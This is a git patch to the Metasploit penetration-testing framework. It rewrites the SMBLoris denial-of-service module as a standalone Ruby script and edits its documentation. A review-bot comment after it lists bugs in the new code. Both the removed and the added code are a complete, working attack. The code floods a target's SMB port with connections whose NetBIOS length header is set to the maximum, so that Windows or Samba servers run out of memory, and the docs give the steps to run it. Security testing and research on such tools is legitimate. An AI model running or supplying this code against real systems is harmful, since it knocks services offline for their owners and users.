From 5ece14b064dc143653d672fa646d23371ecb881c Mon Sep 17 00:00:00 2001
From: Adam Cammack
Date: Fri, 23 Mar 2018 14:55:18 -0500
Subject: [PATCH] Convert SMBLoris to an external module

---
 .../modules/auxiliary/dos/smb/smb_loris.md | 21 +--
 modules/auxiliary/dos/smb/smb_loris.rb | 176 +++++++++---------
 2 files changed, 100 insertions(+), 97 deletions(-)
 mode change 100644 => 100755 modules/auxiliary/dos/smb/smb_loris.rb

diff --git a/documentation/modules/auxiliary/dos/smb/smb_loris.md b/documentation/modules/auxiliary/dos/smb/smb_loris.md
index b52819fde6..ed8d607b4c 100644
--- a/documentation/modules/auxiliary/dos/smb/smb_loris.md
+++ b/documentation/modules/auxiliary/dos/smb/smb_loris.md
@@ -3,7 +3,7 @@
 This module exploits a vulnerability in the NetBIOS Session Service Header for SMB. Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable. See [the SMBLoris page](http://smbloris.com/) for details on the vulnerability.
-
+
 The module opens over 64,000 connections to the target service, so please make sure your system ULIMIT is set appropriately to handle it. A single host running this module can theoretically consume up to 8GB of memory on the target.
@@ -14,7 +14,7 @@
 1. Start msfconsole
 1. Do: `use auxiliary/dos/smb/smb_loris`
- 1. Do: `set RHOST [IP]`
+ 1. Do: `set rhost [IP]`
 1. Do: `run`
 1. Target should allocate increasing amounts of memory.
@@ -30,14 +30,11 @@ msf auxiliary(smb_loris) > msf auxiliary(smb_loris) > run
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1025
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1026
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1027
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1028
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1029
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1030
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1031
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1032
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1033
-....
+[*] Starting server...
+[*] 192.168.172.138:445 - 100 socket(s) open
+[*] 192.168.172.138:445 - 200 socket(s) open
+...
+[!] 192.168.172.138:445 - At open socket limit with 4000 sockets open. Try increasing you system limits.
+[*] 192.168.172.138:445 - Holding steady at 4000 socket(s) open
+...
 ```
diff --git a/modules/auxiliary/dos/smb/smb_loris.rb b/modules/auxiliary/dos/smb/smb_loris.rb
old mode 100644
new mode 100755
index 3d70ce4122..10856b1294
--- a/modules/auxiliary/dos/smb/smb_loris.rb
+++ b/modules/auxiliary/dos/smb/smb_loris.rb
@@ -1,89 +1,95 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
+#!/usr/bin/env ruby
+
+require 'socket'
+require 'metasploit'
 require 'bindata'
-require 'ruby_smb'
-
-class MetasploitModule < Msf::Auxiliary
- include Msf::Exploit::Remote::Tcp
- include Msf::Auxiliary::Dos
-
- class NbssHeader < BinData::Record
- endian :little
- uint8 :message_type
- bit7 :flags
- bit17 :message_length
- end
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'SMBLoris NBSS Denial of Service',
- 'Description' => %q{
- The SMBLoris attack consumes large chunks of memory in the target by sending
- SMB requests with the NetBios Session Service(NBSS) Length Header value set
- to the maximum possible value. By keeping these connections open and initiating
- large numbers of these sessions, the memory does not get freed, and the server
- grinds to a halt. This vulnerability was originally disclosed by Sean Dillon
- and Zach Harding.
-
- DISCALIMER: This module opens a lot of simultaneous connections. Please check
- your system's ULIMIT to make sure it can handle it. This module will also run
- continuously until stopped.
- },
- 'Author' =>
- [
- 'thelightcosine'
- ],
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- [ 'URL', 'http://smbloris.com/' ]
- ],
- 'DisclosureDate' => 'Jul 29 2017'
- ))
-
- register_options(
- [
- Opt::RPORT(445)
- ])
- end
-
- def run
- header = NbssHeader.new
- header.message_length = 0x01FFFF
-
- linger = Socket::Option.linger(true, 60)
-
- while true do
- sockets = {}
- (1025..65535).each do |src_port|
- print_status "Sending packet from Source Port: #{src_port}"
- opts = {
- 'CPORT' => src_port,
- 'ConnectTimeout' => 360
- }
-
- if sockets[src_port]
- disconnect(sockets[src_port])
- end
-
- begin
- nsock = connect(false, opts)
- nsock.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true)
- nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPCNT, 5))
- nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10))
- nsock.setsockopt(linger)
- nsock.write(header.to_binary_s)
- sockets[src_port] = nsock
- rescue ::Exception => e
- print_error "Exception sending packet: #{e.message}"
- end
- end
- end
-
-
- end
+class NbssHeader < BinData::Record
+ endian :little
+ uint8 :message_type
+ bit7 :flags
+ bit17 :message_length
+end
+
+metadata = {
+ name: 'SMBLoris NBSS Denial of Service',
+ description: %q{
+ The SMBLoris attack consumes large chunks of memory in the target by sending
+ SMB requests with the NetBios Session Service(NBSS) Length Header value set
+ to the maximum possible value. By keeping these connections open and initiating
+ large numbers of these sessions, the memory does not get freed, and the server
+ grinds to a halt. This vulnerability was originally disclosed by Sean Dillon
+ and Zach Harding.
+
+ DISCALIMER: This module opens a lot of simultaneous connections. Please check
+ your system's ULIMIT to make sure it can handle it. This module will also run
+ continuously until stopped.
+ },
+ authors: [
+ 'thelightcosine',
+ 'Adam Cammack '
+ ],
+ date: '2017-06-29',
+ references: [
+ { type: 'url', ref: 'http://smbloris.com/' }
+ ],
+ type: 'dos',
+ options: {
+ rhost: {type: 'address', description: 'The target address', required: true, default: nil},
+ rport: {type: 'port', description: 'SMB port on the target', required: true, default: 445},
+ }
+}
+
+def run(args)
+ header = NbssHeader.new
+ header.message_length = 0x01FFFF
+
+ last_reported = 0
+ warned = false
+ n_loops = 0
+ sockets = []
+
+ target = Addrinfo.tcp(args[:rhost], args[:rport].to_i)
+
+ Metasploit.logging_prefix = "#{target.inspect_sockaddr} - "
+
+ while true do
+ begin
+ sockets.delete_if do |s|
+ s.closed?
+ end
+
+ nsock = target.connect(timeout: 360)
+ nsock.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true)
+ nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPCNT, 5))
+ nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10))
+ nsock.setsockopt(Socket::Option.linger(true, 60))
+ nsock.write(header.to_binary_s)
+ sockets << nsock
+
+ n_loops += 1
+ if last_reported != sockets.length
+ if n_loops % 100 == 0
+ last_reported = sockets.length
+ Metasploit.log "#{sockets.length} socket(s) open", level: 'info'
+ end
+ elsif n_loops % 1000 == 0
+ Metasploit.log "Holding steady at #{sockets.length} socket(s) open", level: 'info'
+ end
+ rescue Interrupt
+ break
+ sockets.each &:close
+ rescue Errno::EMFILE
+ Metasploit.log "At open socket limit with #{sockets.length} sockets open. Try increasing you system limits.", level: 'warning' unless warned
+ warned = true
+ sockets.slice(0).close
+ rescue Exception => e
+ Metasploit.log "Exception sending packet: #{e.message}", level: 'error'
+ end
+ end
+end
+
+if __FILE__ == $PROGRAM_NAME
+ Metasploit.run(metadata, method(:run))
 end
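Review bot: In the `rescue Interrupt` clause of `run`, `break` runs before `sockets.each &:close`, so the close loop is unreachable and the held connections are only released when the process exits; put `sockets.each(&:close)` before `break`, or close them in an `ensure` after the loop. In the `rescue Errno::EMFILE` clause, `sockets.slice(0).close` leaves the closed socket in `sockets` until the next pass of `delete_if`, and when `sockets` is empty it calls `close` on nil, raising NoMethodError from inside the rescue where the sibling `rescue Exception` does not apply; `sockets.shift&.close` avoids both. That final `rescue Exception => e` also traps SystemExit and NoMemoryError, and `rescue StandardError => e` is sufficient since Interrupt already has its own clause. The warning string `Try increasing you system limits.` should read `your`. The new `date: '2017-06-29'` does not agree with the removed `'DisclosureDate' => 'Jul 29 2017'` (June vs July), which looks like a transcription slip worth confirming against the reference.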